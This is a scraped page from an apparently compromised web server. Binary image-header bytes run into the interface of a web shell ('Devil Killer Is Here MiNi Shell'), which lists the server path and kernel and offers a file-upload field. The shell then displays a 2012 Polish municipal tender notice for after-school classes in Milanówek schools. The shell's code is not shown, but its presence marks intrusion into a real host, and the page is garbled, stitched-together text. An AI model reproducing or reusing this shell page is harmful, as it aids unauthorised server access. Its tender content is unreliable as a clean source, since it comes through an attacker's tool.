JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120117/14690-N-2012.html

<p class="kh_header"><b>Milanówek: Usługa edukacyjna w ramach projektu Indywidualizacja nauczania 
i wychowania klas I-III w Gminie Milanówek</b><br>
<b>Numer ogłoszenia: 14690 - 2012; data zamieszczenia: 17.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Milanówka , ul. Kościuszki 45, 05-822 Milanówek, woj. mazowieckie, tel. 022 7583061 w. 109, faks 022 7248039.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.milanowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna w ramach projektu Indywidualizacja nauczania 
i wychowania klas I-III w Gminie Milanówek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa edukacyjna obejmująca prowadzenie zajęć pozalekcyjnych w ramach projektu Indywidualizacja nauczania i wychowania klas I-III w Gminie Milanówek w roku szkolnym 2011/2012 i 2012/2013 w szkołach podstawowych, dla których organem prowadzącym jest Gmina Milanówek.

Zakres zamówienia:
Prowadzenie zajęć pozalekcyjnych w klasach I-III w 3 szkołach podstawowych 
w ramach projektu Indywidualizacja nauczania i wychowania klas I-III w Gminie Milanówek w roku szkolnym 2011/2012 i 2012/2013 na terenie miasta Milanówka. 
Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, priorytet IX Rozwój wykształcenia i kompetencji w regionach, poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

Zamówienie obejmuje prowadzenie zajęć dla uczniów:
- ze specyficznymi trudnościami w  czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji,
- z trudnościami w zdobywaniu umiejętności matematycznych,
- z zaburzeniami rozwoju mowy,
- z zaburzeniami komunikacji społecznej,
- posiadających zaburzenia słuchu, wzroku, przewlekle chorych,
- wymagających rozwijania zainteresowań z zakresu nauk matematyczno-przyrodniczych,
- wymagających rozwijania zainteresowań plastycznych.

Ze względu na specyfikę przedmiotu zamówienia konieczne jest prowadzenie zajęć 
z dziećmi z danej szkoły na terenie danej placówki po zakończeniu lub przed rozpoczęciem obowiązkowych zajęć lekcyjnych wg opracowanego harmonogramu, który musi być uzgodniony z dyrektorem szkoły. Ponadto zajęcia muszą być prowadzone w oparciu o autorskie programy uwzględniające przeprowadzoną diagnozę potrzeb uczestników projektu.

Zajęcia dla dzieci muszą trwać odpowiednio:
Dla części 3, 7, 8, 12, 13 zajęcia specjalistyczne - 60 minut,
Dla części 1, 2, 5, 6, 10, 11 zajęcia dydaktyczno-wyrównawcze - 45 minut,
Dla części 4, 9, 14 zajęcia rozwijające uzdolnienia - 45 minut.

Do obowiązków prowadzącego będzie należało m.in.:
1. Prowadzenie zajęć pozalekcyjnych (zajęcia po zakończeniu lub przed rozpoczęciem obowiązkowych lekcji w godzinach dostosowanych do wymogów uczestników i warunków szkoły) w terminie od dnia zawarcia umowy do 30.06.2012 roku oraz od 1.09.2012 roku do 30.06.2013 roku.
2. Opracowanie w terminie 7 dni kalendarzowych od dnia zawarcia umowy, programu i planu pracy zajęć pozalekcyjnych obejmującego harmonogram oraz zakres zadania dla uczestników projektu, a następnie przedstawienia do akceptacji dyrektorowi szkoły i koordynatorowi projektu.
Program zajęć (dot. danej części przedmiotu zamówienia) powinien zawierać:
- cel ogólny i cele szczegółowe zajęć,
- formy realizacji,
- sposoby realizacji celów,
- oczekiwane efekty,
- sposób ewaluacji efektów,
- tematy kolejnych zajęć,
- wykorzystanie pomocy dydaktycznych zakupionych w ramach projektu.

Uwagi dodatkowe: program dostosowany jest do poziomu rozwoju uczniów, nie przewyższa ich możliwości, treści zajęć są sensownie dobrane, uwzględniają aktualną wiedzę, czas zajęć jest maksymalnie wykorzystany.

3. Dokumentowanie na bieżąco zajęć pozalekcyjnych (karty czasu pracy, dzienniki zajęć, imienne listy obecności).
4. Sporządzanie sprawozdań semestralnych z realizacji zajęć na podstawie analiz, diagnoz i innych narzędzi wykorzystywanych do pomiaru jakości i mierzenia rezultatów, do pomocy i współpracy z osobami nadzorującymi projekt, współpracy z dyrektorem szkoły, w której będą prowadzone zajęcia oraz referatem oświaty Urzędu Miasta Milanówka.
5. Informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu.
6. Terminowe wypełnianie wszystkich wymaganych dokumentów projektu. 
7. Przestrzeganie obowiązków, zaleceń i terminów wynikających z realizacji umowy.
8. Opieka nad uczniami podczas zajęć.
9. Dbałości o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu.
10. Współdziałanie z dyrektorem szkoły, w której odbywają się zajęcia w zakresie spraw mających wpływ na rytm pracy szkoły w związku z prowadzeniem zajęć.
11. Przestrzeganie obowiązujących przepisów prawa i Statutu Szkoły, w której będą prowadzone zajęcia.

Zajęcia edukacyjne prowadzone będą w niżej wymienionych szkołach podstawowych:
1.Szkole Podstawowej nr 1 w Zespole Szkół Gminnych nr 1 im. Ks. Piotra Skargi
ul. Królewska 69

2.Szkole Podstawowej nr 2 im. Armii Krajowej ul. Literacka 2

3. Szkole Podstawowej nr 3 w Zespole Szkół Gminnych nr 3 im. Fryderyka Chopina
ul. Żabie Oczko 1

W ramach realizacji zamówienia Wykonawca przeprowadzi łącznie w 3 szkołach 2190 godzin zajęć edukacyjnych, w tym:
Zespół Szkół Gminnych nr 1 im. Ks. Piotra Skargi
Część 1: Zajęcia dla dzieci ze specyficznymi trudnościami w  czytaniu 
i pisaniu, w tym także zagrożonych ryzykiem dysleksji: 
8 grup po 5 dzieci - 240 godzin po 45 minut
rok 2011-2012 - 120 h, rok 2012-2013 - 120 h
CPV:   80.00.00.00-4

Część 2: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych: 
6 grup po 5 dzieci - 180 godzin po 45 minut
rok 2011-2012 - 90 h, rok 2012-2013 - 90 h
CPV:  80.00.00.00-4

Część 3: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 
5 grup po 4 dzieci  - 150 godzin po 60 minut
rok 2011-2012 - 60 h, rok 2012-2013 - 90 h
CPV: 80.00.00.00-4

Część 4: Zajęcia rozwijające zainteresowania uczniów wybitnie i szczególnie uzdolnionych z zakresu nauk matematyczno-przyrodniczych:
3 grupy po 6-7 dzieci - 90 godzin po 45 minut
rok 2011-2012 - 60h, rok 2012-2013 - 30 h
CPV: 80.00.00.00-4

Szkoła Podstawowa nr 2 im. Armii Krajowej 
Część 5: Zajęcia dla dzieci ze specyficznymi trudnościami w  czytaniu 
i pisaniu, w tym także zagrożonych ryzykiem dysleksji:
8 grup po 4-5 dzieci - 240 godzin po 45 minut
rok 2011-2012 - 120 h, rok 2012-2013 - 120 h
CPV: 80.00.00.00-4

Część 6: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych:
4 grupy po 4-5 dzieci - 120 godzin po 45 minut
rok 2011-2012 - 60 h, rok 2012-2013 - 60 h
CPV: 80.00.00.00-4

Część 7: Zajęcia socjoterapeutyczne i  psychoedukacyjne dla dzieci 
z zaburzeniami komunikacji społecznej:
2 grupy po 6-7 dzieci - 60 godzin po 60 minut
rok 2011-2012 - 30 h, rok 2012-2013 - 30 h
CPV: 80.00.00.00-4

Część 8: Zajęcia dla dzieci posiadających zaburzenia słuchu, wzroku, przewlekle chorzy:
4 grupy po 4-5 dzieci - 120 godzin po 60 minut
rok 2011-2012 - 60 h, rok 2012-2013 - 60 h
CPV: 80.00.00.00-4

Część 9: Zajęcia rozwijające zainteresowania uczniów wybitnie i szczególnie uzdolnionych z zakresu nauk matematyczno-przyrodniczych: 
5 grup po 7 dzieci - 150 godzin po 45 minut
rok 2011-2012 - 90 h, rok 2012-2013 - 60 h
CPV: 80.00.00.00-4

Zespół Szkół Gminnych nr 3 im. Fryderyka Chopina
Część 10: Zajęcia dla dzieci ze specyficznymi trudnościami w  czytaniu 
i pisaniu, w tym także zagrożonych ryzykiem dysleksji: 
12 grup. po 4-5 dzieci - 360 godzin po 45 minut
rok 2011-2012 - 180 h, rok 2012-2013 - 180 h
CPV: 80.00.00.00-4


Część 11: Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych:
5 grup po 5-6 dzieci - 150 godzin po 45 minut
rok 2011-2012 - 60 h, rok 2012-2013 - 90 h
CPV: 80.00.00.00-4

Część 12: Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy: 
7 grup po 3-4 dzieci - 210 godzin po 60 minut
rok 2011-2012 - 90 h, rok 2012-2013 - 120 h
CPV: 80.00.00.00-4

Część 13: Zajęcia socjoterapeutyczne i  psychoedukacyjne dla dzieci 
z zaburzeniami komunikacji społecznej:
2 grupy po 11-12 dzieci - 60 godzin po 60 minut
rok 2011-2012 - 30 h, rok 2012-2013 - 30 h
CPV: 80.00.00.00-4

Część 14: Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych plastycznie:
2 grupy po 7 dzieci - 60 godzin po 45 minut
rok 2011-2012 - 30 h, rok 2012-2013 - 30 h
CPV: 80.00.00.00-4

U W A G A !!!
Wykonawca będzie zobowiązany bezwzględnie dostosować się do ustalonego przez dyrektora szkoły planu zajęć. Dotyczy to również organizacji wycieczek, spotkań 
i wyjazdów w ramach zajęć a także organizowanych imprez.

Wynagrodzenie nauczycieli prowadzących zajęcia będzie wynagrodzeniem współfinansowanym ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego.

Zamawiający informuje, iż wynagrodzenie będzie wypłacane za rzeczywiste godziny pracy w trakcie roku szkolnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż na czas realizacji zamówienia będzie dysponował co najmniej 1 osobą dla każdej części zamówienia posiadającą: 
- wykształcenie wyższe w specjalności wymaganej specyfiką prowadzonych zajęć,
- co najmniej 3 letnie doświadczenie pedagogiczne w pracy w szkole podstawowej, 
- minimum stopień awansu zawodowego - nauczyciel kontraktowy ,
- kwalifikacje dla odpowiedniej części zamówienia, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz. U. Nr 50, poz. 400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli.

Zamawiający określając wymóg w zakresie posiadanych kwalifikacji, dopuszcza kwalifikacje, które zostały wydane na podstawie ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394).
Potencjalni Wykonawcy z innych państw członkowskich Unii Europejskiej mogą spełnić ten warunek posiadając równoważne uprawnienia uzyskane w swoich krajach pochodzenia.

Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych oświadczeń i dokumentów wyszczególnionych 
w SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień umowy zawartej z wybranym Wykonawcą w następujących przypadkach:
- zmiany przepisów prawa przez ustawodawcę, zawarta umowa ulegnie odpowiedniej zmianie w tej części, której ta zmiana będzie dotyczyła,
- wymaganych przez Instytucję współfinansującą Projekt zmiany (zmniejszenia, zwiększenia) ilości godzin dla każdej części zamówienia,
- wymaganych przez Instytucję współfinansującą Projekt zmiany terminu wykonywania zamówienia,
- wymaganych przez Instytucję współfinansującą Projekt zmiany (zmniejszenia, zwiększenia) ilości uczniów uczestniczących w projekcie,
- ze względu na dofinansowanie zadania możliwa jest zmiana umowy w zakresie konieczności dostosowania umowy z Wykonawcą do postanowień umowy 
o dofinansowanie,
- zmniejszenia ilości uczniów biorących udział w zajęciach skierowanych przez dyrektorów placówek oświatowych,
- zwiększenia ilości uczniów do korzystania z zajęć edukacyjnych skierowanych przez dyrektorów placówek,
- zmiany osób prowadzących zajęcia edukacyjne, a nowe osoby wykażą spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o zamówienie publiczne,
- Wystąpienie okoliczności powodujących konieczność zmiany osób, które będą uczestniczyć w wykonaniu przedmiotu zamówienia na osoby z co najmniej równoważnymi kwalifikacjami i doświadczeniem.

O wystąpieniu okoliczności mogących wpłynąć na zmianę zawartej umowy Strony zobowiązane są poinformować pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.milanowek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na wniosek Zainteresowanego, w referacie Oświaty ulica Kościuszki 45 w godzinach pracy Urzędu.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2012 godzina 11:30, miejsce: Oferty należy składać w punkcie obsługi interesanta Urzędu Miasta Milanówka w Milanówku ul. Spacerowa 4, bądź wysłać pocztą na ten sam adres Zamawiającego..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany będzie w ramach Programu Operacyjnego Kapitał Ludzki, priorytet IX Rozwój wykształcenia i kompetencji w regionach, poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</p>
